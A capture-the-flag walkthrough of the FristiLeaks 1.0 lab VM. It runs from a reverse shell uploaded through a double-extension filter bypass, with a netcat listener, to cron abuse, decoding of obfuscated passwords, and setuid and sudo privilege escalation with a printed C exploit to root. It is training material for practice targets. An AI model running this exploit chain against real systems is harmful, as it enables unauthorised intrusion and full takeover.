First of all, you need to manually edit the VM's MAC address to 08:00:27:A5:A6:76.
Once the VM is installed and booted, its IP address is displayed on the console.
But we can still try nmap to confirm it.
root@kali:~# nmap 172.16.219.0/24
Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-24 10:00 PST
... ...
Nmap scan report for 172.16.219.176
Host is up (-0.00070s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 256 IP addresses (4 hosts up) scanned in 201.14 seconds
root@kali:~# nikto -host 172.16.219.176
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.219.176
+ Target Hostname: 172.16.219.176
+ Target Port: 80
+ Start Time: 2018-01-24 10:51:21 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 10:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8348 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2018-01-24 10:51:36 (GMT-8) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Navigate to: http://172.16.219.176/fristi/
Yes! There's an admin portal login window!
First, look at the page source: there are several comments.
After base64-decoding the second comment, I got a picture.
Let's try to log in using "eezeepz" as the username and "keKkeKKeKKeKkEkkEk" as the password.
Login successful!
This is a file upload page, so it might be possible to upload a backdoor shell. I used this backdoor:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Oops! There's a filter. Okay, let's try using php.jpg as the extension to bypass it.
It worked! Now, using the backdoor, we can do some fancy things. Navigate to http://172.16.219.176/fristi/uploads/php-reverse-shell.php.jpg in your browser. On the Kali box, run:
root@kali:/home/flora# nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.219.177] from (UNKNOWN) [172.16.219.176] 35707
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
10:53:24 up 5:08, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$
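The filter above only looked at the final extension, which is why php-reverse-shell.php.jpg got through. As an added example (not code from the writeup or from the FristiLeaks VM), here is that weak check beside a stricter one; it assumes the usual reason a double extension executes, an AddHandler-style rule that matches a .php segment anywhere in the name, and uses constructed sample filenames.

```python
import re
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

def weak_filter(name: str) -> bool:
    """The check the upload page effectively used: only the last extension
    is inspected, so 'php-reverse-shell.php.jpg' passes even though the
    web server's handler rule can still treat the '.php' segment as PHP."""
    return name.lower().rsplit(".", 1)[-1] in ALLOWED_EXT

def strict_filter(name: str) -> bool:
    """Exactly one extension, from the allowlist, and a plain base name:
    there is no second extension left for a handler rule to match."""
    m = re.fullmatch(r"([a-z0-9_-]{1,64})\.([a-z0-9]{1,5})", name.lower())
    return bool(m) and m.group(2) in ALLOWED_EXT

def stored_name(name: str) -> str:
    """Never keep the client's filename: store under a random name with the
    validated extension so nothing the uploader chose reaches the filesystem."""
    if not strict_filter(name):
        raise ValueError("rejected upload name: %r" % name)
    return "%s.%s" % (secrets.token_hex(8), name.lower().rsplit(".", 1)[-1])

# Constructed sample names (hypothetical, not taken from the target)
SAMPLES = ["photo.jpg", "php-reverse-shell.php.jpg", "shell.phtml", "a.jpg.php"]

def audit(names=SAMPLES):
    """Return {name: (weak_result, strict_result)} to show where the checks differ."""
    return {n: (weak_filter(n), strict_filter(n)) for n in names}

if __name__ == "__main__":
    for n, (w, s) in audit().items():
        print("%-28s weak=%-5s strict=%s" % (n, w, s))
```

Storing uploads outside the web root, or in a directory where the server never runs a script handler, is the second half of the fix; the name check alone does not stop a renamed shell from being stored, only from being executed.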
sh-4.1$ cat /var/www/notes.txt
cat /var/www/notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
sh-4.1$ ls /home
ls /home
admin
eezeepz
fristigod
sh-4.1$ ls /home/eezeepz
ls /home/eezeepz
MAKEDEV
cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic
sh-4.1$
sh-4.1$ cat /home/eezeepz/notes.txt
cat /home/eezeepz/notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
sh-4.1$
According to the note:
sh-4.1$ echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
sh-4.1$ ls -l
ls -l
total 32
-rw-r--r-- 1 admin admin 16589 Jan 24 12:43 cronresult
-rw-r--r-- 1 apache apache 130 Jan 24 11:51 exp.c
-rw-rw-rw- 1 apache apache 34 Jan 24 12:43 runthis
sh-4.1$ /home/eezeepz/chmod 777 runthis
/home/eezeepz/chmod 777 runthis
sh-4.1$ ls -l
ls -l
total 32
-rw-r--r-- 1 admin admin 16634 Jan 24 12:44 cronresult
-rw-r--r-- 1 apache apache 130 Jan 24 11:51 exp.c
-rwxrwxrwx 1 apache apache 34 Jan 24 12:43 runthis
sh-4.1$ ./runthis
./runthis
/home/admin/chmod: changing permissions of `/home/admin': Operation not permitted
sh-4.1$ ls -l /home/admin
ls -l /home/admin
total 632
-rwxrwxrwx 1 admin admin 45224 Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
sh-4.1$
Now we have access to the /home/admin folder.
A few of the files there look interesting.
sh-4.1$ cat /home/admin/whoisyourgodnow.txt
cat /home/admin/whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
sh-4.1$ cat /home/admin/cryptedpass.txt
cat /home/admin/cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
sh-4.1$ cat /home/admin/cryptpass.py
cat /home/admin/cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
Open a Python interpreter and reverse the steps (rot13 is its own inverse):
>>> import base64, codecs
>>> def decode(str):
...     de = codecs.decode(str[::-1],'rot13')
...     return base64.b64decode(de)
...
>>> decode('=RFn0AKnlMHMPIzpyuTI0ITG')
'LetThereBeFristi!'
>>> decode('mVGZ3O3omkJLmy2pcuTq')
'thisisalsopw123'
>>>
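The session above runs under the target's Python 2. As an added example (not from the writeup or from the VM's cryptpass.py), the same scheme ported to Python 3 with explicit bytes handling, plus a round trip over the two values read from /home/admin; it shows that the scheme is keyless obfuscation, so anyone holding the stored string recovers the password.

```python
import base64
import codecs

def encode_string(plain: str) -> str:
    """cryptpass.py's scheme in Python 3: base64, reverse, then rot13."""
    b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")

def decode_string(stored: str) -> str:
    """Undo each step: rot13 is its own inverse, un-reverse, then base64-decode.
    No key is involved anywhere, which is why the stored values are not secrets."""
    b64 = codecs.decode(stored, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")

def recover_all(stored_values):
    """Map every stored value to its plaintext."""
    return {v: decode_string(v) for v in stored_values}

# The two values quoted in the writeup (whoisyourgodnow.txt, cryptedpass.txt)
STORED = ["=RFn0AKnlMHMPIzpyuTI0ITG", "mVGZ3O3omkJLmy2pcuTq"]

if __name__ == "__main__":
    for stored, plain in recover_all(STORED).items():
        assert encode_string(plain) == stored  # round trip must hold
        print(stored, "->", plain)
```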
Spawning a TTY shell:
sh-4.1$ perl -e 'exec "/bin/sh";'
perl -e 'exec "/bin/sh";'
id
uid=48(apache) gid=48(apache) groups=48(apache)
su fristigod
standard in must be a tty
exit
sh-4.1$ echo os.system('/bin/bash')
echo os.system('/bin/bash')
sh: syntax error near unexpected token `('
sh-4.1$ echo os.system\('/bin/bash'\)
os.system(/bin/bash)
echo os.system\('/bin/bash'\)
sh-4.1$ python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$
bash-4.1$ /var/fristigod/.secret_admin_stuff/doCom
/var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
bash-4.1$ ls -la
ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff
bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
bash-4.1$
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -l
ls -l
total 8
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
Look at the doCom file's permissions: the setuid bit is set and the owner is root.
bash-4.1$ ./doCom
./doCom
Nice try, but wrong user ;)
bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root
sudo -u fristi ./doCom chmod -R 777 /root
[sudo] password for fristigod: LetThereBeFristi!
bash-4.1$ ls /root
ls /root
fristileaks_secrets.txt
bash-4.1$ cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
bash-4.1$
Got the flag!
Some more exploits:
Use the same setuid(0) method as in Kioptrix 1.3 (#4).
//expp.c:
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
    setuid(0);          /* run as root when launched via the setuid-root doCom */
    system("usermod -a -G admin fristigod");
    return 0;
}
Rename expp.c to expp.c.jpg, upload it to the server, then compile it as expp.
bash-4.1$ sudo -u fristi ./doCom chown root expp
sudo -u fristi ./doCom chown root expp
bash-4.1$ sudo -u fristi ./doCom chmod 6755 expp
sudo -u fristi ./doCom chmod 6755 expp
bash-4.1$ ls -l
ls -l
total 28
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
-rwsr-sr-x 1 root fristigod 6565 Jan 24 13:57 exp
-rwsr-sr-x 1 root fristigod 6574 Jan 24 14:01 expp
-rw-r--r-- 1 apache apache 133 Jan 24 14:00 expp.c
bash-4.1$ sudo -u fristi ./doCom ./expp
sudo -u fristi ./doCom ./expp
bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ sudo su
sudo su
Sorry, user fristigod is not allowed to execute '/bin/su' as root on localhost.localdomain.
bash-4.1$ sudo -u fristi ./doCom sudo su
sudo -u fristi ./doCom sudo su
[root@localhost .secret_admin_stuff]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@localhost .secret_admin_stuff]#